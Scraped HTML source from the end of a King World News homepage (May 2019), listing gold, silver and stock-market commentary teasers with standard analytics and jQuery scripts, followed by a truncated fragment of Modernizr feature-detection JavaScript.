src="https://kingworldnews.com/wp-content/uploads/2014/12/King-World-News-Will-This-Disaster-Be-The-Catalyst-For-10000-Gold-275x200_c.jpg" alt="ALERT: We Are Now In On The Brink" title="ALERT: We Are Now In On The Brink" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 07, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/alert-we-are-now-in-on-the-brink/">ALERT: We Are Now In On The Brink</a></h2> <p>On the heels of the Dow and the Nasdaq tumbling, it appears we are now on the brink.</p> </article> <article class="main-post post-364450 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/danger-this-warning-signal-has-ushered-in-disastrous-stock-market-returns/"> <img src="https://kingworldnews.com/wp-content/uploads/2014/11/King-World-News-Wild-Trading-In-Global-Markets-Reveals-Dangerous-Trend-275x200_c.jpg" alt="DANGER: This Warning Signal Has Triggered Disastrous Stock Market Returns!" title="DANGER: This Warning Signal Has Triggered Disastrous Stock Market Returns!" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 07, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/danger-this-warning-signal-has-ushered-in-disastrous-stock-market-returns/">DANGER: This Warning Signal Has Triggered Disastrous Stock Market Returns!</a></h2> <p>After a wild trading day to start the second week of trading in May, this warning signal has triggered disastrous stock market returns.</p> </article> <article class="main-post post-364458 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/fleckenstein-buy-the-dip-is-more-powerful-now-than-in-2000-or-2007-reminds-me-of-1920s-mania/"> <img src="https://kingworldnews.com/wp-content/uploads/2015/03/KWN-Pento-I-372015-275x200_c.jpg" alt="Fleckenstein &#8211; &#8220;Buy The Dip&#8221; Is More Powerful Now Than In 2000 Or 2007, Reminds Me Of 1920s Mania" title="Fleckenstein &#8211; &#8220;Buy The Dip&#8221; Is More Powerful Now Than In 2000 Or 2007, Reminds Me Of 1920s Mania" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 07, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/fleckenstein-buy-the-dip-is-more-powerful-now-than-in-2000-or-2007-reminds-me-of-1920s-mania/">Fleckenstein &#8211; &#8220;Buy The Dip&#8221; Is More Powerful Now Than In 2000 Or 2007, Reminds Me Of 1920s Mania</a></h2> <p>As stocks continue to frustrate bears, today one of the greats said &#8220;buy the dip&#8221; is more powerful now than in 2000 or 2007, reminding him of how people were conditioned in the roaring 1920s to buy any dips.</p> </article> <article class="main-post post-364441 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/the-silver-lining-silver-demand-reaches-three-year-high/"> <img src="https://kingworldnews.com/wp-content/uploads/2016/05/KWN-Leeb-I-5282016-275x200_c.jpg" alt="ALERT: Silver Demand Reaches Three-Year High" title="ALERT: Silver Demand Reaches Three-Year High" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 06, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/the-silver-lining-silver-demand-reaches-three-year-high/">ALERT: Silver Demand Reaches Three-Year High</a></h2> <p>With the price of silver still trading below $15, there is a silver lining &#8212; silver demand has reached a three-year high.</p> </article> <article class="main-post post-364434 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/greyerz-gold-silver-about-to-kickoff-the-most-spectacular-bull-markets-the-world-has-ever-seen/"> <img src="https://kingworldnews.com/wp-content/uploads/2014/04/Add-These-Superfoods-And-Drinks-NOW-To-Reduce-Your-Risk-Of-Cancer-KWN--275x200_c.jpg" alt="Greyerz &#8211; Gold &#038; Silver About To Kickoff The Most Spectacular Bull Markets The World Has Ever Seen" title="Greyerz &#8211; Gold &#038; Silver About To Kickoff The Most Spectacular Bull Markets The World Has Ever Seen" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 05, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/greyerz-gold-silver-about-to-kickoff-the-most-spectacular-bull-markets-the-world-has-ever-seen/">Greyerz &#8211; Gold &#038; Silver About To Kickoff The Most Spectacular Bull Markets The World Has Ever Seen</a></h2> <p>As the world edges closer to the next crisis, today the man who has become legendary for his predictions on QE and historic moves in currencies told King World News that gold and silver are about to kickoff the most spectacular bull markets the world has ever seen.</p> </article> <article class="main-post post-364424 post type-post status-publish format-standard has-post-thumbnail hentry category-gold category-king-world-news"> <div class="cont-img"> <a href="https://kingworldnews.com/adrian-day-here-are-a-couple-of-great-strategies-to-employ-while-waiting-for-gold-to-breakout/"> <img src="https://kingworldnews.com/wp-content/uploads/2014/11/King-World-News-Greatest-Opportunity-In-The-War-In-The-Gold-Silver-Markets-275x200_c.jpg" alt="Adrian Day &#8211; Here Are A Couple Of Great Strategies To Employ While Waiting For Gold To Breakout" title="Adrian Day &#8211; Here Are A Couple Of Great Strategies To Employ While Waiting For Gold To Breakout" /> </a> </div> <div class="entry-meta"> <span class="post-date date updated">May 04, 2019</span> <span class="post-category"> <a href="https://kingworldnews.com/category/gold/">GOLD</a>, <a href="https://kingworldnews.com/category/king-world-news/">KWN</a> </span> <span class="post-author"><a href="https://kingworldnews.com/author/eric-king/" title="Posts by King World News" rel="author">King World News</a></span> </div> <h2 class="entry-title"><a href="https://kingworldnews.com/adrian-day-here-are-a-couple-of-great-strategies-to-employ-while-waiting-for-gold-to-breakout/">Adrian Day &#8211; Here Are A Couple Of Great Strategies To Employ While Waiting For Gold To Breakout</a></h2> <p>On the heels of a rally in the gold and silver markets on Friday, Adrian Day spoke with King World News about a couple of great strategies to employ while waiting for gold to breakout.</p> </article> </div> <ul class='page-numbers'> <li><span aria-current='page' class='page-numbers current'>1</span></li> <li><a class='page-numbers' href='https://kingworldnews.com/page/2/'>2</a></li> <li><a class='page-numbers' href='https://kingworldnews.com/page/3/'>3</a></li> <li><span class="page-numbers dots">&hellip;</span></li> <li><a class='page-numbers' href='https://kingworldnews.com/page/164/'>164</a></li> <li><a class="next page-numbers" href="https://kingworldnews.com/page/2/">NEXT</a></li> </ul> <div class="clear"></div> <div class="category-block-news-2 clearfix"> <div class="category-title" style="background-color: #820099"> <h3>KWN BROADCAST</h3> <a href="https://kingworldnews.com/category/broadcast/" class="category-link"></a> </div> <ul class="block-news"> <div class="group-post-list"> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/pierre-lassonde-5-11-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2018/09/Pierre-Lassonde-HS-200x200_c.jpg" alt="Pierre Lassonde" title="Pierre Lassonde" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">May 11, 2019</span> </div> <h2> <a href="https://kingworldnews.com/pierre-lassonde-5-11-2019/">Pierre Lassonde</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/adrian-day-5-4-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2018/10/KWN-Adrian-Day-III-200x200_c.jpg" alt="Adrian Day" title="Adrian Day" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">May 03, 2019</span> </div> <h2> <a href="https://kingworldnews.com/adrian-day-5-4-2019/">Adrian Day</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/andrew-maguire-4-27-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2015/01/King-World-News-Andrew-Maguire-HS-200x200_c.jpg" alt="Andrew Maguire" title="Andrew Maguire" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">April 26, 2019</span> </div> <h2> <a href="https://kingworldnews.com/andrew-maguire-4-27-2019/">Andrew Maguire</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/gerald-celente-4-20-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2015/01/Gerald-Celente.HS_-200x200_c.jpg" alt="Gerald Celente" title="Gerald Celente" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">April 19, 2019</span> </div> <h2> <a href="https://kingworldnews.com/gerald-celente-4-20-2019/">Gerald Celente</a> </h2> </div> </li> </div> <div class="group-post-list"> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/james-turk-4-13-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2017/11/KWN-James-Turk-HS-200x200_c.jpg" alt="James Turk" title="James Turk" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">April 12, 2019</span> </div> <h2> <a href="https://kingworldnews.com/james-turk-4-13-2019/">James Turk</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/egon-von-greyerz-4-6-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2014/12/Egon-von-Greyerz.HS_-200x200_c.jpg" alt="Egon von Greyerz" title="Egon von Greyerz" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">April 06, 2019</span> </div> <h2> <a href="https://kingworldnews.com/egon-von-greyerz-4-6-2019/">Egon von Greyerz</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/andrew-maguire-3-30-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2015/01/King-World-News-Andrew-Maguire-HS-200x200_c.jpg" alt="Andrew Maguire" title="Andrew Maguire" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">March 30, 2019</span> </div> <h2> <a href="https://kingworldnews.com/andrew-maguire-3-30-2019/">Andrew Maguire</a> </h2> </div> </li> <li class="small-thumb-post"> <div class="cont-img"> <a href="https://kingworldnews.com/peter-boockvar-3-23-2019/"> <img src="https://kingworldnews.com/wp-content/uploads/2019/03/KWN-Peter-Boockvar-Bleakly-Financial-Group-200x200_c.jpg" alt="Peter Boockvar" title="Peter Boockvar" /> </a> </div> <div class="description"> <div class="entry-meta"> <span class="post-date">March 23, 2019</span> </div> <h2> <a href="https://kingworldnews.com/peter-boockvar-3-23-2019/">Peter Boockvar</a> </h2> </div> </li> </div> <div class="group-post-list"> </div> </ul> </div> </div> </div> <footer id="footer"> <div class="container"> <div class="row"> <aside class="widget-1 first widget"><h3 class="widget-title">Search</h3> <form method="get" name="searchform" action="https://kingworldnews.com" class="search-form"> <input type="text" placeholder="Search..." name="s" id="s"> <input type="submit" value="Submit"> </form> </aside><aside class="widget-2 widget"><h3 class="widget-title">Share Buttons</h3><div id="ssba-classic-2" class="ssba ssbp-wrap left ssbp--theme-1"><div style="text-align:left"><a data-site="" class="ssba_facebook_share" href="http://www.facebook.com/sharer.php?u=https://kingworldnews.com/" target="_blank"><img src="https://kingworldnews.com/wp-content/plugins/simple-share-buttons-adder/buttons/somacro/facebook.png" style="width: 48px;" title="Facebook" class="ssba ssba-img" alt="Share on Facebook" /><div title="Facebook" class="ssbp-text">Facebook</div></a><a data-site="" class="ssba_twitter_share" href="http://twitter.com/share?url=https://kingworldnews.com/&amp;text=Homepage%20" target=&quot;_blank&quot;><img src="https://kingworldnews.com/wp-content/plugins/simple-share-buttons-adder/buttons/somacro/twitter.png" style="width: 48px;" title="Twitter" class="ssba ssba-img" alt="Tweet about this on Twitter" /><div title="Twitter" class="ssbp-text">Twitter</div></a><a data-site="" class="ssba_google_share" href="https://plus.google.com/share?url=https://kingworldnews.com/" target=&quot;_blank&quot;><img src="https://kingworldnews.com/wp-content/plugins/simple-share-buttons-adder/buttons/somacro/google.png" style="width: 48px;" title="Google+" class="ssba ssba-img" alt="Share on Google+" /><div title="Google+" class="ssbp-text">Google+</div></a><a data-site="linkedin" class="ssba_linkedin_share ssba_share_link" href="http://www.linkedin.com/shareArticle?mini=true&amp;url=https://kingworldnews.com/" target=&quot;_blank&quot;><img src="https://kingworldnews.com/wp-content/plugins/simple-share-buttons-adder/buttons/somacro/linkedin.png" style="width: 48px;" title="LinkedIn" class="ssba ssba-img" alt="Share on LinkedIn" /><div title="Linkedin" class="ssbp-text">Linkedin</div></a><a data-site="email" class="ssba_email_share" href="/cdn-cgi/l/email-protection#231c505641494640571e6b4c4e4653424446050013101b18414c475a1e0611134b57575350190c0c484a4d44544c514f474d4654500d404c4e0c"><img src="https://kingworldnews.com/wp-content/plugins/simple-share-buttons-adder/buttons/somacro/email.png" style="width: 48px;" title="Email" class="ssba ssba-img" alt="Email this to someone" /><div title="email" class="ssbp-text">email</div></a><a data-site="print" class="ssba_print ssba_share_link " href="#" onclick="window.print()"><img src="https://kingworldnews.com/wp-content/plugins/simple-share-buttons-adder/buttons/somacro/print.png" style="width: 48px;" title="Print" class="ssba ssba-img" alt="Print this page" /><div title="Print" class="ssbp-text">Print</div></a></div></div></aside> <aside class="widget-3 widget"> <h3 class="widget-title">KWN Disclaimer</h3> <div class="widget-text"> <p><p><a href=https://kingworldnews.com/king-world-news-disclaimer/> KWN Disclaimer </a></p> </p> </div> </aside> <aside class="widget-4 last widget"> <h3 class="widget-title">Contact Us</h3> <div class="widget-text"> <p><p><a href=https://kingworldnews.com/contact-us/> Contact Us </a></p> </p> </div> </aside> </div> </div> <div id="copyright"> <p>&copy; 2019 Copyright King World News &reg<br> </p> <p><a href="#" id="back-to-top"><i class="fa fa-arrow-circle-up"></i></a></p> </div> </footer> </div> <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript"> if ( typeof(jQuery) !== 'undefined' ) { jQuery( document ).ready(function(){ function monsterinsights_scroll_tracking_load() { if ( typeof(__gaTracker) !== 'undefined' && __gaTracker && __gaTracker.hasOwnProperty( "loaded" ) && __gaTracker.loaded == true ) { (function(factory) { if (typeof define === 'function' && define.amd) { // AMD define(['jquery'], factory); } else if (typeof module === 'object' && module.exports) { // CommonJS module.exports = factory(require('jquery')); } else { // Browser globals factory(jQuery); } }(function($) { /* Scroll Depth */ "use strict"; var defaults = { percentage: true }; var $window = $(window), cache = [], scrollEventBound = false, lastPixelDepth = 0; /* * Plugin */ $.scrollDepth = function(options) { var startTime = +new Date(); options = $.extend({}, defaults, options); /* * Functions */ function sendEvent(action, label, scrollDistance, timing) { var fieldsArray = { hitType : 'event', eventCategory : 'Scroll Depth', eventAction : action, eventLabel : label, eventValue : 1, nonInteraction: 1 }; MonsterInsightsObject.sendEvent( fieldsArray ); // if (arguments.length > 2 && scrollDistance > lastPixelDepth) { // lastPixelDepth = scrollDistance; // fieldsArray = { // hitType : 'event', // eventCategory : 'Scroll Depth', // eventAction : 'Pixel Depth', // eventLabel : rounded(scrollDistance), // eventValue : 1, // nonInteraction: 1 // }; // MonsterInsightsObject.sendEvent( fieldsArray ); // } if (arguments.length > 3) { fieldsArray = { hitType : 'timing', timingCategory : 'Scroll Depth', timingVar : action, timingValue : timing, timingLabel : label, nonInteraction: 1 }; MonsterInsightsObject.sendEvent( fieldsArray ); } } function calculateMarks(docHeight) { return { '25%' : parseInt(docHeight * 0.25, 10), '50%' : parseInt(docHeight * 0.50, 10), '75%' : parseInt(docHeight * 0.75, 10), // Cushion to trigger 100% event in iOS '100%': docHeight - 5 }; } function checkMarks(marks, scrollDistance, timing) { // Check each active mark $.each(marks, function(key, val) { if ( $.inArray(key, cache) === -1 && scrollDistance >= val ) { sendEvent('Percentage', key, scrollDistance, timing); cache.push(key); } }); } function rounded(scrollDistance) { // Returns String return (Math.floor(scrollDistance/250) * 250).toString(); } function init() { bindScrollDepth(); } /* * Public Methods */ // Reset Scroll Depth with the originally initialized options $.scrollDepth.reset = function() { cache = []; lastPixelDepth = 0; $window.off('scroll.scrollDepth'); bindScrollDepth(); }; // Add DOM elements to be tracked $.scrollDepth.addElements = function(elems) { if (typeof elems == "undefined" || !$.isArray(elems)) { return; } $.merge(options.elements, elems); // If scroll event has been unbound from window, rebind if (!scrollEventBound) { bindScrollDepth(); } }; // Remove DOM elements currently tracked $.scrollDepth.removeElements = function(elems) { if (typeof elems == "undefined" || !$.isArray(elems)) { return; } $.each(elems, function(index, elem) { var inElementsArray = $.inArray(elem, options.elements); var inCacheArray = $.inArray(elem, cache); if (inElementsArray != -1) { options.elements.splice(inElementsArray, 1); } if (inCacheArray != -1) { cache.splice(inCacheArray, 1); } }); }; /* * Throttle function borrowed from: * Underscore.js 1.5.2 * http://underscorejs.org * (c) 2009-2013 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors * Underscore may be freely distributed under the MIT license. */ function throttle(func, wait) { var context, args, result; var timeout = null; var previous = 0; var later = function() { previous = new Date; timeout = null; result = func.apply(context, args); }; return function() { var now = new Date; if (!previous) previous = now; var remaining = wait - (now - previous); context = this; args = arguments; if (remaining <= 0) { clearTimeout(timeout); timeout = null; previous = now; result = func.apply(context, args); } else if (!timeout) { timeout = setTimeout(later, remaining); } return result; }; } /* * Scroll Event */ function bindScrollDepth() { scrollEventBound = true; $window.on('scroll.scrollDepth', throttle(function() { /* * We calculate document and window height on each scroll event to * account for dynamic DOM changes. */ var docHeight = $(document).height(), winHeight = window.innerHeight ? window.innerHeight : $window.height(), scrollDistance = $window.scrollTop() + winHeight, // Recalculate percentage marks marks = calculateMarks(docHeight), // Timing timing = +new Date - startTime; checkMarks(marks, scrollDistance, timing); }, 500)); } init(); }; // UMD export return $.scrollDepth; })); jQuery.scrollDepth(); } else { setTimeout(monsterinsights_scroll_tracking_load, 200); } } monsterinsights_scroll_tracking_load(); }); } </script> <link rel='stylesheet' id='simple-share-buttons-adder-ssba-css' href='https://kingworldnews.com/wp-content/plugins/simple-share-buttons-adder/css/ssba.css?ver=4.9.10' type='text/css' media='all' /> <style id='simple-share-buttons-adder-ssba-inline-css' type='text/css'> .ssba { padding: 0px; } .ssba img { width: 48px !important; padding: 6px; border: 0; box-shadow: none !important; display: inline !important; vertical-align: middle; box-sizing: unset; } #ssba-classic-2 .ssbp-text { display: none!important; } .ssba .fb-save { padding: 6px; line-height: 43px; } .ssba, .ssba a { text-decoration:none; background: none; font-size: 20px; } @font-face { font-family: 'ssbp'; src:url('https://kingworldnews.com/wp-content/plugins/simple-share-buttons-adder/fonts/ssbp.eot?xj3ol1'); src:url('https://kingworldnews.com/wp-content/plugins/simple-share-buttons-adder/fonts/ssbp.eot?#iefixxj3ol1') format('embedded-opentype'), url('https://kingworldnews.com/wp-content/plugins/simple-share-buttons-adder/fonts/ssbp.woff?xj3ol1') format('woff'), url('https://kingworldnews.com/wp-content/plugins/simple-share-buttons-adder/fonts/ssbp.ttf?xj3ol1') format('truetype'), url('https://kingworldnews.com/wp-content/plugins/simple-share-buttons-adder/fonts/ssbp.svg?xj3ol1#ssbp') format('svg'); font-weight: normal; font-style: normal; /* Better Font Rendering =========== */ -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } </style> <script type='text/javascript' src='https://kingworldnews.com/wp-content/plugins/simple-share-buttons-adder/js/ssba.js?ver=4.9.10'></script> <script type='text/javascript'> Main.boot( [] ); </script> <script type='text/javascript' src='https://kingworldnews.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/js/admin/jquery.c00kie.js?ver=1.0'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/js/jquery.easing.js?ver=4.9.10'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/js/jquery.menu.js?ver=4.9.10'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/js/jquery.sticky.js?ver=4.9.10'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/js/jquery.bxslider.js?ver=4.9.10'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/js/jquery.lightbox.js?ver=4.9.10'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/js/jquery.customselect.js?ver=4.9.10'></script> <script type='text/javascript'> /* <![CDATA[ */ var df = {"adminUrl":"https:\/\/kingworldnews.com\/wp-admin\/admin-ajax.php","imageUrl":"https:\/\/kingworldnews.com\/wp-content\/themes\/yaaburnee-themes\/lib\/img\/","cssUrl":"https:\/\/kingworldnews.com\/wp-content\/themes\/yaaburnee-themes\/lib\/css\/","themeUrl":"https:\/\/kingworldnews.com\/wp-content\/themes\/yaaburnee-themes","responsiveON":"1256"}; /* ]]> */ </script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/js/jquery.custom.js?ver=4.9.10'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/js/yaaburnee.js?ver=4.9.10'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-content/themes/yaaburnee-themes/lib/js/scripts.php?ver=4.9.10'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-includes/js/comment-reply.min.js?ver=4.9.10'></script> <script type='text/javascript' src='https://kingworldnews.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script> </body> </html>
0
(function(e,t,n){var r=[];var a=[];var i={_version:"3.6.0",_config:{classPrefix:"",enableClasses:true,enableJSClass:true,usePrefixes:true},_q:[],on:function(e,t){var n=this;setTimeout(function(){t(n[e])},0)},addTest:function(e,t,n){a.push({name:e,fn:t,options:n})},addAsyncTest:function(e){a.push({name:null,fn:e})}};var o=function(){};o.prototype=i;o=new o;o.addTest("blobconstructor",function(){try{return!!new Blob}catch(e){return false}},{aliases:["blob-constructor"]});o.addTest("cors","XMLHttpRequest"in e&&"withCredentials"in new XMLHttpRequest);o.addTest("dataview",typeof DataView!=="undefined"&&"getFloat64"in DataView.prototype);o.addTest("history",function(){var t=navigator.userAgent;if((t.indexOf("Android 2.")!==-1||t.indexOf("Android 4.0")!==-1)&&t.indexOf("Mobile Safari")!==-1&&t.indexOf("Chrome")===-1&&t.indexOf("Windows Phone")===-1&&location.protocol!=="file:"){return false}return e.history&&"pushState"in e.history});o.addTest("filereader",!!(e.File&&e.FileList&&e.FileReader));o.addTest("localstorage",function(){var e="modernizr";try{localStorage.setItem(e,e);localStorage.removeItem(e);return true}catch(e){return false}});o.addTest("sessionstorage",function(){var e="modernizr";try{sessionStorage.setItem(e,e);sessionStorage.removeItem(e);return true}catch(e){return false}});var s=i._config.usePrefixes?" -webkit- -moz- -o- -ms- ".split(" "):["",""];i._prefixes=s;function l(e,t){return typeof e===t}function f(){var e;var t;var n;var i;var s;var f;var u;for(var c in a){if(a.hasOwnProperty(c)){e=[];t=a[c];if(t.name){e.push(t.name.toLowerCase());if(t.options&&t.options.aliases&&t.options.aliases.length){for(n=0;n<t.options.aliases.length;n++){e.push(t.options.aliases[n].toLowerCase())}}}i=l(t.fn,"function")?t.fn():t.fn;for(s=0;s<e.length;s++){f=e[s];u=f.split(".");if(u.length===1){o[u[0]]=i}else{if(o[u[0]]&&!(o[u[0]]instanceof Boolean)){o[u[0]]=new Boolean(o[u[0]])}o[u[0]][u[1]]=i}r.push((i?"":"no-")+u.join("-"))}}}}var u=t.documentElement;var c=u.nodeName.toLowerCase()==="svg";function d(e){var t=u.className;var n=o._config.classPrefix||"";if(c){t=t.baseVal}if(o._config.enableJSClass){var r=new RegExp("(^|\\s)"+n+"no-js(\\s|$)");t=t.replace(r,"$1"+n+"js$2")}if(o._config.enableClasses){t+=" "+n+e.join(" "+n);if(c){u.className.baseVal=t}else{u.className=t}}}var p;if(!c){(function(e,t){var n="3.7.3";var r=e.html5||{};var a=/^<|^(?:button|map|select|textarea|object|iframe|option|optgroup)$/i;var i=/^(?:a|b|code|div|fieldset|h1|h2|h3|h4|h5|h6|i|label|li|ol|p|q|span|strong|style|table|tbody|td|th|tr|ul)$/i;var o;var s="_html5shiv";var l=0;var f={};var u;(function(){try{var e=t.createElement("a");e.innerHTML="<xyz></xyz>";o="hidden"in e;u=e.childNodes.length==1||function(){t.createElement("a");var e=t.createDocumentFragment();return typeof e.cloneNode=="undefined"||typeof e.createDocumentFragment=="undefined"||typeof e.createElement=="undefined"}()}catch(e){o=true;u=true}})();function c(e,t){var n=e.createElement("p"),r=e.getElementsByTagName("head")[0]||e.documentElement;n.innerHTML="x<style>"+t+"</style>";return r.insertBefore(n.lastChild,r.firstChild)}function d(){var e=E.elements;return typeof e=="string"?e.split(" "):e}function p(e,t){var n=E.elements;if(typeof n!="string"){n=n.join(" ")}if(typeof e!="string"){e=e.join(" ")}E.elements=n+" "+e;h(t)}function v(e){var t=f[e[s]];if(!t){t={};l++;e[s]=l;f[l]=t}return t}function m(e,n,r){if(!n){n=t}if(u){return n.createElement(e)}if(!r){r=v(n)}var o;if(r.cache[e]){o=r.cache[e].cloneNode()}else if(i.test(e)){o=(r.cache[e]=r.createElem(e)).cloneNode()}else{o=r.createElem(e)}return o.canHaveChildren&&!a.test(e)&&!o.tagUrn?r.frag.appendChild(o):o}function A(e,n){if(!e){e=t}if(u){return e.createDocumentFragment()}n=n||v(e);var r=n.frag.cloneNode(),a=0,i=d(),o=i.length;for(;a<o;a++){r.createElement(i[a])}return r}function g(e,t){if(!t.cache){t.cache={};t.createElem=e.createElement;t.createFrag=e.createDocumentFragment;t.frag=t.createFrag()}e.createElement=function(n){if(!E.shivMethods){return t.createElem(n)}return m(n,e,t)};e.createDocumentFragment=Function("h,f","return function(){"+"var n=f.cloneNode(),c=n.createElement;"+"h.shivMethods&&("+d().join().replace(/[\w\-:]+/g,function(e){t.createElem(e);t.frag.createElement(e);return'c("'+e+'")'})+");return n}")(E,t.frag)}function h(e){if(!e){e=t}var n=v(e);if(E.shivCSS&&!o&&!n.hasCSS){n.hasCSS=!!c(e,"article,aside,dialog,figcaption,figure,footer,header,hgroup,main,nav,section{display:block}"+"mark{background:#FF0;color:#000}"+"template{display:none}")}if(!u){g(e,n)}return e}var E={elements:r.elements||"abbr article aside audio bdi canvas data datalist details dialog figcaption figure footer header hgroup main mark meter nav output picture progress section summary template time video",version:n,shivCSS:r.shivCSS!==false,supportsUnknownElements:u,shivMethods:r.shivMethods!==false,type:"default",shivDocument:h,createElement:m,createDocumentFragment:A,addElements:p};e.html5=E;h(t);if(typeof module=="object"&&module.exports){module.exports=E}})(typeof e!=="undefined"?e:this,t)}var v="Moz O ms Webkit";var m=i._config.usePrefixes?v.toLowerCase().split(" "):[];i._domPrefixes=m;function A(e){return e.replace(/([a-z])-([a-z])/g,function(e,t,n){return t+n.toUpperCase()}).replace(/^-/,"")}function g(){if(typeof t.createElement!=="function"){return t.createElement(arguments[0])}else if(c){return t.createElementNS.call(t,"http://www.w3.org/2000/svg",arguments[0])}else{return t.createElement.apply(t,arguments)}}o.addTest("canvas",function(){var e=g("canvas");return!!(e.getContext&&e.getContext("2d"))});o.addTest("canvastext",function(){if(o.canvas===false){return false}return typeof g("canvas").getContext("2d").fillText=="function"});o.addTest("video",function(){var e=g("video");var t=false;try{t=!!e.canPlayType;if(t){t=new Boolean(t);t.ogg=e.canPlayType('video/ogg; codecs="theora"').replace(/^no$/,"");t.h264=e.canPlayType('video/mp4; codecs="avc1.42E01E"').replace(/^no$/,"");t.webm=e.canPlayType('video/webm; codecs="vp8, vorbis"').replace(/^no$/,"");t.vp9=e.canPlayType('video/webm; codecs="vp9"').replace(/^no$/,"");t.hls=e.canPlayType('application/x-mpegURL; codecs="avc1.42E01E"').replace(/^no$/,"")}}catch(e){}return t});var h=g("canvas");o.addTest("todataurljpeg",function(){return!!o.canvas&&h.toDataURL("image/jpeg").indexOf("data:image/jpeg")===0});o.addTest("todataurlpng",function(){return!!o.canvas&&h.toDataURL("image/png").indexOf("data:image/png")===0});o.addTest("todataurlwebp",function(){var e=false;try{e=!!o.canvas&&h.toDataURL("image/webp").indexOf("data:image/webp")===0}catch(e){}return e});o.addTest("cssgradients",function(){var e="background-image:";var t="gradient(linear,left top,right bottom,from(#9f9),to(white));";var n="";var r;for(var a=0,i=s.length-1;a<i;a++){r=a===0?"to ":"";n+=e+s[a]+"linear-gradient("+r+"left top, #9f9, white);"}if(o._config.usePrefixes){n+=e+"-webkit-"+t}var l=g("a");var 